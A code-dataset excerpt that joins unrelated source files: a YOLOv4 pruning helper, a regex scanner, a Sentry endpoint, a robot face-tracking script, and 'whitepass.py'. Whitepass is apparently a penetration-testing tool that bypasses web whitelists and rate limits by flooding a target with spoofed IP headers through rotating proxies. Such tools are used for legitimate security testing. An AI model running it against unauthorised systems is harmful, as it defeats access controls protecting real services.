<filename>yolov4_pytorch/utils/prune.py # Copyright 2020 Lorna Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import torch.nn as nn def sparsity(model): # Return global model sparsity a, b = 0., 0. for p in model.parameters(): a += p.numel() b += (p == 0).sum() return b / a def prune(model, amount=0.3): # Prune model to requested global sparsity import torch.nn.utils.prune as prune print("Pruning model... ", end="") for name, m in model.named_modules(): if isinstance(m, nn.Conv2d): prune.l1_unstructured(m, name="weight", amount=amount) # prune prune.remove(m, "weight") # make permanent print(f" {sparsity(model):.3f} global sparsity")
<filename>yolov4_pytorch/utils/prune.py # Copyright 2020 Lorna Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import torch.nn as nn def sparsity(model): # Return global model sparsity a, b = 0., 0. for p in model.parameters(): a += p.numel() b += (p == 0).sum() return b / a def prune(model, amount=0.3): # Prune model to requested global sparsity import torch.nn.utils.prune as prune print("Pruning model... ", end="") for name, m in model.named_modules(): if isinstance(m, nn.Conv2d): prune.l1_unstructured(m, name="weight", amount=amount) # prune prune.remove(m, "weight") # make permanent print(f" {sparsity(model):.3f} global sparsity")
en
0.796564
# Copyright 2020 Lorna Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # Return global model sparsity # Prune model to requested global sparsity # prune # make permanent
2.312798
2
whitepass.py
cyberstruggle/whitepass
20
6618625
<gh_stars>10-100 #!/usr/bin/env python3 from utils import * import argparse import sys import os import requests import random import concurrent.futures import threading import time from concurrent.futures import ThreadPoolExecutor, as_completed banner = """ ██╗ ██╗██╗ ██╗██╗████████╗███████╗██████╗ █████╗ ███████╗███████╗ ██║ ██║██║ ██║██║╚══██╔══╝██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝ ██║ █╗ ██║███████║██║ ██║ █████╗ ██████╔╝███████║███████╗███████╗ ██║███╗██║██╔══██║██║ ██║ ██╔══╝ ██╔═══╝ ██╔══██║╚════██║╚════██║ ╚███╔███╔╝██║ ██║██║ ██║ ███████╗██║ ██║ ██║███████║███████║ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝ Bypass Whitelist/Ratelimit Implementations in Web Applications/APIs By : <NAME> (@wazehell) (Cyber Struggle Delta Group) """ KNOWN_PAYLOADS_PATH = "./db/known_payloads.txt" KNOWN_HEADERS_PATH = "./db/headers.txt" DEFAULT_THREADS = 50 ALL_PAYLOADS = None PROXIES_LIST = [] def start_whitepass(url=None,method="get",data={},headers={}): request_headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} request_headers.update(headers) request_data = {} proxies = {} request_data.update(data) request_func = None bad_http = [400,500,407,408,405,429] content_len = 0 http_status = 200 http_timeout = 120 try: request_func = getattr(requests, method.lower()) except Exception as e: print("[*] Method Not found !") exit() def do_request(payload={}): try: reqproxies = {} pxomsg = "" if len(PROXIES_LIST): reqproxies = random.choice(PROXIES_LIST) headers = request_headers.copy() headers.update(payload) req = request_func(url,headers=headers,data=data,timeout=http_timeout,proxies=reqproxies) reqc = req.headers.get('Content-Length',0) if len(PROXIES_LIST): pxomsg = f" via ({reqproxies['http']})" else: pxomsg = f" via localhost " if not reqc == content_len and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent Content-Length Using Header 
: {payload}") if not http_status == req.status_code and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent HTTP-Status Using Header : {payload}") return req except Exception as e: pass #testing stage try: req0 = request_func(url,headers=headers,data=data,timeout=http_timeout) req0c = req0.headers.get('Content-Length',0) data.update({'test':str('A'*50)}) req1 = request_func(url,headers=headers,data=data,timeout=http_timeout) req1c = req1.headers.get('Content-Length',0) req2 = request_func(url,headers=headers,params=data,timeout=http_timeout) req2c = req2.headers.get('Content-Length',0) data.update({'test':str('A'*100)}) req3 = request_func(url,headers=headers,params=data,timeout=120) req3c = req3.headers.get('Content-Length',0) if req0c == req1c == req2c: content_len = req0c else: if int(int(req2c) - int(req0c)) == 50: content_len = req0c else: #todo pass if req0.status_code == req2.status_code == req3.status_code: http_status = req0.status_code else: http_status = req0.status_code #todo if http_status == 429: http_status = 200 print(f'[*] Content-Length Response {content_len}') print(f'[*] HTTP-Status Response {http_status}') except Exception as e: pass start = time.time() processes = [] print(f"[*] Starting Test with {len(ALL_PAYLOADS)} Payload") with ThreadPoolExecutor(max_workers=DEFAULT_THREADS) as executor: for payload in ALL_PAYLOADS: processes.append(executor.submit(do_request, payload)) print(f'[*] Testing Done : {time.time() - start}') def whitepass(request_options=None,target_options=None,payload_options=None): global KNOWN_PAYLOADS_PATH,KNOWN_HEADERS_PATH,DEFAULT_THREADS global ALL_PAYLOADS,PROXIES_LIST parsed_request = None additionalrequest_headers = {} additionalrequest_data = {} urllist = target_options['urllist'] url = target_options['url'] requestFile = target_options['requestFile'] request_method = request_options.get('method','get') request_headers = request_options.get('headers',None) request_data = 
request_options.get('data',None) known_ips = payload_options['known_ips'] additionalheaders = payload_options['additionalheaders'] proxylist = payload_options['proxylist'] additionalpayloads = payload_options['additionalpayloads'] threads = payload_options.get('threads',DEFAULT_THREADS) if threads: DEFAULT_THREADS = int(threads) if request_headers: for reqheader in request_headers.split('\\n'): headerk = str(reqheader.split(':')[0]).replace(' ','') headerv = str(reqheader.split(':')[1]).replace(' ','') additionalrequest_headers[headerk] = headerv if request_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in request_data[1:].split("&") ]} if proxylist: if os.path.exists(proxylist): for p in open(proxylist,'r').readlines(): p = p.replace('\n', '') g = p.split(':') proxy_object = { 'http': f'http://{g[0]}:{g[1]}', 'https': f'http://{g[0]}:{g[1]}', } PROXIES_LIST.append(proxy_object) payloads = prepre_payloads(known_ips=known_ips,known_payloads_path=KNOWN_PAYLOADS_PATH, additionalpayloads=additionalpayloads) headers = prepre_headers(additionalheaders=additionalheaders, known_headers_path=KNOWN_HEADERS_PATH) ALL_PAYLOADS = prepare_all(headers=headers,payloads=payloads) urls = [] if url: if validate_url(url): urls.append(validate_url(url)) else: print("bad url bro") exit() if urllist: if os.path.exists(urllist): for p in open(urllist,'r').readlines(): p = p.replace('\n', '') v = validate_url(p) urls.append(p) if v and (not p in headers) else None else: print("list not exit exit") exit() if not urls and not requestFile: print("all targets are bad bro") exit() if requestFile: if os.path.exists(requestFile): data = parseRequestFile(requestFile) request_method = data.get('method',None) url = data.get('url',None) additionalrequest_data = data.get('data',dict()) additionalrequest_headers = data.get('headers',dict()) if url and request_method: if additionalrequest_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in 
additionalrequest_data[1:].split("&") ]} else: additionalrequest_data = dict() else: print("make sure that you got the file using 'save item' in burp") exit() start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) elif len(urls): for url in urls: start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) def main(): print(banner) parser = argparse.ArgumentParser(add_help=True) target = parser.add_argument_group("Target", "At least one of these options has to be provided to define the target(s)") target.add_argument("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/api/login\")") target.add_argument("-l", dest="urllist", help="load target(s) from text file") target.add_argument("-r", dest="requestFile", help="Load HTTP request from a Burp request file or normal plain-text") request_option = parser.add_argument_group("Request", "These options can be used to specify how to connect to the target URL") request_option.add_argument("-m", dest="http_method", help="HTTP Method used to test ", default="GET") request_option.add_argument("--headers", dest="headers", help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") request_option.add_argument("--data", dest="data", help="Data string to be sent through POST (e.g. \"id=1&name=wazehell\")") payload_option = parser.add_argument_group("Payloads", "These options can be used to specify payloads") payload_option.add_argument("-aH", "--headers-list", dest="additionalheaders", help="Load Extra header(s) keys from text file") payload_option.add_argument("-aP", "--payloads", dest="additionalpayloads", help="Load Extra payload(s) from text file") payload_option.add_argument("-aL", "--proxies", dest="proxylist", help="Load proxies from text file ip:port") payload_option.add_argument("--ips", dest="known_ips", help="Known External/Internal IPs for the target comma separated (e.g. 
\"10.10.1.5,172.16.58.3\")") payload_option.add_argument("--threads", dest="threads", type=int, help="Max number of concurrent HTTP(s) requests (default %d)" % DEFAULT_THREADS) (args, _) = parser.parse_known_args(sys.argv) if not any((args.urllist, args.url, args.requestFile)): errMsg = "missing a mandatory option (-l or -u or -r). " errMsg += "Use -h for help\n" parser.error(errMsg) else: request_options= { 'method':args.http_method, 'headers':args.headers, 'data':args.data, } target_options = { 'urllist':args.urllist, 'url':args.url, 'requestFile':args.requestFile, } payload_options = { 'additionalheaders':args.additionalheaders, 'additionalpayloads':args.additionalpayloads, 'proxylist':args.proxylist, 'known_ips':args.known_ips, 'threads':args.threads, } whitepass(request_options=request_options,target_options=target_options,payload_options=payload_options) if __name__ == "__main__": main()
#!/usr/bin/env python3 from utils import * import argparse import sys import os import requests import random import concurrent.futures import threading import time from concurrent.futures import ThreadPoolExecutor, as_completed banner = """ ██╗ ██╗██╗ ██╗██╗████████╗███████╗██████╗ █████╗ ███████╗███████╗ ██║ ██║██║ ██║██║╚══██╔══╝██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝ ██║ █╗ ██║███████║██║ ██║ █████╗ ██████╔╝███████║███████╗███████╗ ██║███╗██║██╔══██║██║ ██║ ██╔══╝ ██╔═══╝ ██╔══██║╚════██║╚════██║ ╚███╔███╔╝██║ ██║██║ ██║ ███████╗██║ ██║ ██║███████║███████║ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝ Bypass Whitelist/Ratelimit Implementations in Web Applications/APIs By : <NAME> (@wazehell) (Cyber Struggle Delta Group) """ KNOWN_PAYLOADS_PATH = "./db/known_payloads.txt" KNOWN_HEADERS_PATH = "./db/headers.txt" DEFAULT_THREADS = 50 ALL_PAYLOADS = None PROXIES_LIST = [] def start_whitepass(url=None,method="get",data={},headers={}): request_headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} request_headers.update(headers) request_data = {} proxies = {} request_data.update(data) request_func = None bad_http = [400,500,407,408,405,429] content_len = 0 http_status = 200 http_timeout = 120 try: request_func = getattr(requests, method.lower()) except Exception as e: print("[*] Method Not found !") exit() def do_request(payload={}): try: reqproxies = {} pxomsg = "" if len(PROXIES_LIST): reqproxies = random.choice(PROXIES_LIST) headers = request_headers.copy() headers.update(payload) req = request_func(url,headers=headers,data=data,timeout=http_timeout,proxies=reqproxies) reqc = req.headers.get('Content-Length',0) if len(PROXIES_LIST): pxomsg = f" via ({reqproxies['http']})" else: pxomsg = f" via localhost " if not reqc == content_len and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent Content-Length Using Header : {payload}") if 
not http_status == req.status_code and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent HTTP-Status Using Header : {payload}") return req except Exception as e: pass #testing stage try: req0 = request_func(url,headers=headers,data=data,timeout=http_timeout) req0c = req0.headers.get('Content-Length',0) data.update({'test':str('A'*50)}) req1 = request_func(url,headers=headers,data=data,timeout=http_timeout) req1c = req1.headers.get('Content-Length',0) req2 = request_func(url,headers=headers,params=data,timeout=http_timeout) req2c = req2.headers.get('Content-Length',0) data.update({'test':str('A'*100)}) req3 = request_func(url,headers=headers,params=data,timeout=120) req3c = req3.headers.get('Content-Length',0) if req0c == req1c == req2c: content_len = req0c else: if int(int(req2c) - int(req0c)) == 50: content_len = req0c else: #todo pass if req0.status_code == req2.status_code == req3.status_code: http_status = req0.status_code else: http_status = req0.status_code #todo if http_status == 429: http_status = 200 print(f'[*] Content-Length Response {content_len}') print(f'[*] HTTP-Status Response {http_status}') except Exception as e: pass start = time.time() processes = [] print(f"[*] Starting Test with {len(ALL_PAYLOADS)} Payload") with ThreadPoolExecutor(max_workers=DEFAULT_THREADS) as executor: for payload in ALL_PAYLOADS: processes.append(executor.submit(do_request, payload)) print(f'[*] Testing Done : {time.time() - start}') def whitepass(request_options=None,target_options=None,payload_options=None): global KNOWN_PAYLOADS_PATH,KNOWN_HEADERS_PATH,DEFAULT_THREADS global ALL_PAYLOADS,PROXIES_LIST parsed_request = None additionalrequest_headers = {} additionalrequest_data = {} urllist = target_options['urllist'] url = target_options['url'] requestFile = target_options['requestFile'] request_method = request_options.get('method','get') request_headers = request_options.get('headers',None) request_data = 
request_options.get('data',None) known_ips = payload_options['known_ips'] additionalheaders = payload_options['additionalheaders'] proxylist = payload_options['proxylist'] additionalpayloads = payload_options['additionalpayloads'] threads = payload_options.get('threads',DEFAULT_THREADS) if threads: DEFAULT_THREADS = int(threads) if request_headers: for reqheader in request_headers.split('\\n'): headerk = str(reqheader.split(':')[0]).replace(' ','') headerv = str(reqheader.split(':')[1]).replace(' ','') additionalrequest_headers[headerk] = headerv if request_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in request_data[1:].split("&") ]} if proxylist: if os.path.exists(proxylist): for p in open(proxylist,'r').readlines(): p = p.replace('\n', '') g = p.split(':') proxy_object = { 'http': f'http://{g[0]}:{g[1]}', 'https': f'http://{g[0]}:{g[1]}', } PROXIES_LIST.append(proxy_object) payloads = prepre_payloads(known_ips=known_ips,known_payloads_path=KNOWN_PAYLOADS_PATH, additionalpayloads=additionalpayloads) headers = prepre_headers(additionalheaders=additionalheaders, known_headers_path=KNOWN_HEADERS_PATH) ALL_PAYLOADS = prepare_all(headers=headers,payloads=payloads) urls = [] if url: if validate_url(url): urls.append(validate_url(url)) else: print("bad url bro") exit() if urllist: if os.path.exists(urllist): for p in open(urllist,'r').readlines(): p = p.replace('\n', '') v = validate_url(p) urls.append(p) if v and (not p in headers) else None else: print("list not exit exit") exit() if not urls and not requestFile: print("all targets are bad bro") exit() if requestFile: if os.path.exists(requestFile): data = parseRequestFile(requestFile) request_method = data.get('method',None) url = data.get('url',None) additionalrequest_data = data.get('data',dict()) additionalrequest_headers = data.get('headers',dict()) if url and request_method: if additionalrequest_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in 
additionalrequest_data[1:].split("&") ]} else: additionalrequest_data = dict() else: print("make sure that you got the file using 'save item' in burp") exit() start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) elif len(urls): for url in urls: start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) def main(): print(banner) parser = argparse.ArgumentParser(add_help=True) target = parser.add_argument_group("Target", "At least one of these options has to be provided to define the target(s)") target.add_argument("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/api/login\")") target.add_argument("-l", dest="urllist", help="load target(s) from text file") target.add_argument("-r", dest="requestFile", help="Load HTTP request from a Burp request file or normal plain-text") request_option = parser.add_argument_group("Request", "These options can be used to specify how to connect to the target URL") request_option.add_argument("-m", dest="http_method", help="HTTP Method used to test ", default="GET") request_option.add_argument("--headers", dest="headers", help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") request_option.add_argument("--data", dest="data", help="Data string to be sent through POST (e.g. \"id=1&name=wazehell\")") payload_option = parser.add_argument_group("Payloads", "These options can be used to specify payloads") payload_option.add_argument("-aH", "--headers-list", dest="additionalheaders", help="Load Extra header(s) keys from text file") payload_option.add_argument("-aP", "--payloads", dest="additionalpayloads", help="Load Extra payload(s) from text file") payload_option.add_argument("-aL", "--proxies", dest="proxylist", help="Load proxies from text file ip:port") payload_option.add_argument("--ips", dest="known_ips", help="Known External/Internal IPs for the target comma separated (e.g. 
\"10.10.1.5,172.16.58.3\")") payload_option.add_argument("--threads", dest="threads", type=int, help="Max number of concurrent HTTP(s) requests (default %d)" % DEFAULT_THREADS) (args, _) = parser.parse_known_args(sys.argv) if not any((args.urllist, args.url, args.requestFile)): errMsg = "missing a mandatory option (-l or -u or -r). " errMsg += "Use -h for help\n" parser.error(errMsg) else: request_options= { 'method':args.http_method, 'headers':args.headers, 'data':args.data, } target_options = { 'urllist':args.urllist, 'url':args.url, 'requestFile':args.requestFile, } payload_options = { 'additionalheaders':args.additionalheaders, 'additionalpayloads':args.additionalpayloads, 'proxylist':args.proxylist, 'known_ips':args.known_ips, 'threads':args.threads, } whitepass(request_options=request_options,target_options=target_options,payload_options=payload_options) if __name__ == "__main__": main()
en
0.140276
#!/usr/bin/env python3 ██╗ ██╗██╗ ██╗██╗████████╗███████╗██████╗ █████╗ ███████╗███████╗ ██║ ██║██║ ██║██║╚══██╔══╝██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝ ██║ █╗ ██║███████║██║ ██║ █████╗ ██████╔╝███████║███████╗███████╗ ██║███╗██║██╔══██║██║ ██║ ██╔══╝ ██╔═══╝ ██╔══██║╚════██║╚════██║ ╚███╔███╔╝██║ ██║██║ ██║ ███████╗██║ ██║ ██║███████║███████║ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝ Bypass Whitelist/Ratelimit Implementations in Web Applications/APIs By : <NAME> (@wazehell) (Cyber Struggle Delta Group) #testing stage #todo #todo
2.623601
3
ifparser/re_scan.py
trevormccasland/ifconfig-parser
19
6618626
<reponame>trevormccasland/ifconfig-parser<gh_stars>10-100 """ Copyright (c) 2015 by <NAME>. Some rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * The names of the contributors may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
""" from __future__ import unicode_literals, print_function import sys from sre_compile import compile as sre_compile from sre_constants import BRANCH, SUBPATTERN from sre_parse import Pattern, SubPattern, parse class _ScanMatch(object): def __init__(self, match, rule, start, end): self._match = match self._start = start self._end = end self._rule = rule def __getattr__(self, name): return getattr(self._match, name) def __group_proc(self, method, group): if group == 0: return method() if isinstance(group, basestring): return method(self._rule + '\x00' + group) real_group = self._start + group if real_group > self._end: raise IndexError('no such group') return method(real_group) def group(self, *groups): if len(groups) in (0, 1): return self.__group_proc(self._match.group, groups and groups[0] or 0) return tuple( self.__group_proc(self._match.group, group) for group in groups) def groupdict(self, default=None): prefix = self._rule + '\x00' rv = {} for key, value in self._match.groupdict(default).items(): if key.startswith(prefix): rv[key[len(prefix):]] = value return rv def span(self, group=0): return self.__group_proc(self._match.span, group) def groups(self): return self._match.groups()[self._start:self._end] def start(self, group=0): return self.__group_proc(self._match.start, group) def end(self, group=0): return self.__group_proc(self._match.end, group) def expand(self, template): raise RuntimeError('Unsupported on scan matches') class ScanEnd(Exception): def __init__(self, pos): Exception.__init__(self, pos) self.pos = pos class Scanner(object): def __init__(self, rules, flags=0): pattern = Pattern() pattern.flags = flags if sys.version_info < (3, 0): pattern.groups = len(rules) + 1 _og = pattern.opengroup pattern.opengroup = lambda n: _og(n and '%s\x00%s' % (name, n) or n) self.rules = [] subpatterns = [] for group, (name, regex) in enumerate(rules, 1): last_group = pattern.groups - 1 subpatterns.append( SubPattern(pattern, [ (SUBPATTERN, (group, parse(regex, 
flags, pattern))), ])) self.rules.append((name, last_group, pattern.groups - 1)) self._scanner = sre_compile( SubPattern(pattern, [(BRANCH, (None, subpatterns))])).scanner def scan(self, string, skip=False): sc = self._scanner(string) match = None for match in iter(sc.search if skip else sc.match, None): rule, start, end = self.rules[match.lastindex - 1] yield rule, _ScanMatch(match, rule, start, end) if not skip: end = match and match.end() or 0 if end < len(string): raise ScanEnd(end) def scan_with_holes(self, string): pos = 0 for rule, match in self.scan(string, skip=True): hole = string[pos:match.start()] if hole: yield None, hole yield rule, match pos = match.end() hole = string[pos:] if hole: yield None, hole
""" Copyright (c) 2015 by <NAME>. Some rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * The names of the contributors may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
""" from __future__ import unicode_literals, print_function import sys from sre_compile import compile as sre_compile from sre_constants import BRANCH, SUBPATTERN from sre_parse import Pattern, SubPattern, parse class _ScanMatch(object): def __init__(self, match, rule, start, end): self._match = match self._start = start self._end = end self._rule = rule def __getattr__(self, name): return getattr(self._match, name) def __group_proc(self, method, group): if group == 0: return method() if isinstance(group, basestring): return method(self._rule + '\x00' + group) real_group = self._start + group if real_group > self._end: raise IndexError('no such group') return method(real_group) def group(self, *groups): if len(groups) in (0, 1): return self.__group_proc(self._match.group, groups and groups[0] or 0) return tuple( self.__group_proc(self._match.group, group) for group in groups) def groupdict(self, default=None): prefix = self._rule + '\x00' rv = {} for key, value in self._match.groupdict(default).items(): if key.startswith(prefix): rv[key[len(prefix):]] = value return rv def span(self, group=0): return self.__group_proc(self._match.span, group) def groups(self): return self._match.groups()[self._start:self._end] def start(self, group=0): return self.__group_proc(self._match.start, group) def end(self, group=0): return self.__group_proc(self._match.end, group) def expand(self, template): raise RuntimeError('Unsupported on scan matches') class ScanEnd(Exception): def __init__(self, pos): Exception.__init__(self, pos) self.pos = pos class Scanner(object): def __init__(self, rules, flags=0): pattern = Pattern() pattern.flags = flags if sys.version_info < (3, 0): pattern.groups = len(rules) + 1 _og = pattern.opengroup pattern.opengroup = lambda n: _og(n and '%s\x00%s' % (name, n) or n) self.rules = [] subpatterns = [] for group, (name, regex) in enumerate(rules, 1): last_group = pattern.groups - 1 subpatterns.append( SubPattern(pattern, [ (SUBPATTERN, (group, parse(regex, 
flags, pattern))), ])) self.rules.append((name, last_group, pattern.groups - 1)) self._scanner = sre_compile( SubPattern(pattern, [(BRANCH, (None, subpatterns))])).scanner def scan(self, string, skip=False): sc = self._scanner(string) match = None for match in iter(sc.search if skip else sc.match, None): rule, start, end = self.rules[match.lastindex - 1] yield rule, _ScanMatch(match, rule, start, end) if not skip: end = match and match.end() or 0 if end < len(string): raise ScanEnd(end) def scan_with_holes(self, string): pos = 0 for rule, match in self.scan(string, skip=True): hole = string[pos:match.start()] if hole: yield None, hole yield rule, match pos = match.end() hole = string[pos:] if hole: yield None, hole
en
0.72574
Copyright (c) 2015 by <NAME>. Some rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * The names of the contributors may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
1.695048
2
src/sentry/api/endpoints/release_details.py
arsh-co/sentry
0
6618627
from __future__ import absolute_import from rest_framework.response import Response from sentry.api.base import DocSection, Endpoint from sentry.api.permissions import assert_perm from sentry.api.serializers import serialize from sentry.models import Release class ReleaseDetailsEndpoint(Endpoint): doc_section = DocSection.RELEASES def get(self, request, release_id): """ Retrieve an release Return details on an individual release. {method} {path} """ release = Release.objects.get(id=release_id) assert_perm(release, request.user, request.auth) return Response(serialize(release, request.user))
from __future__ import absolute_import from rest_framework.response import Response from sentry.api.base import DocSection, Endpoint from sentry.api.permissions import assert_perm from sentry.api.serializers import serialize from sentry.models import Release class ReleaseDetailsEndpoint(Endpoint): doc_section = DocSection.RELEASES def get(self, request, release_id): """ Retrieve an release Return details on an individual release. {method} {path} """ release = Release.objects.get(id=release_id) assert_perm(release, request.user, request.auth) return Response(serialize(release, request.user))
en
0.710513
Retrieve an release Return details on an individual release. {method} {path}
2.115279
2
home/GroG/workyTracking.py
rv8flyboy/pyrobotlab
63
6618628
<filename>home/GroG/workyTracking.py useVirtualArduino = True; xPin = 9; yPin = 6; arduinoPort = "COM5"; cameraIndex = 0; # using Sarxos for usb webcam, the other frame grabbers only worked on my integrated camera frameGrabberType = "org.myrobotlab.opencv.SarxosFrameGrabber"; Runtime.start("gui", "SwingGui"); if useVirtualArduino: virtual = Runtime.start("virtual", "VirtualArduino"); virtual.connect(arduinoPort); t01 = Runtime.start("t01", "Tracking"); x = t01.getX(); # invert if necessary # x.setInverted(True); y = t01.getY(); # invert if necessary # y.setInverted(True); t01.connect(arduinoPort, xPin, yPin, cameraIndex); opencv = t01.getOpenCV(); # noticed some swing display issues - I don't think Sarxos gets updated to display opencv.setFrameGrabberType(frameGrabberType); opencv.broadcastState(); # not sure if necessary - but get things to settle for 3 seconds # before starting tracking sleep(3); # do lk optical point tracking # t01.startLKTracking(); # do face tracking t01.faceDetect();
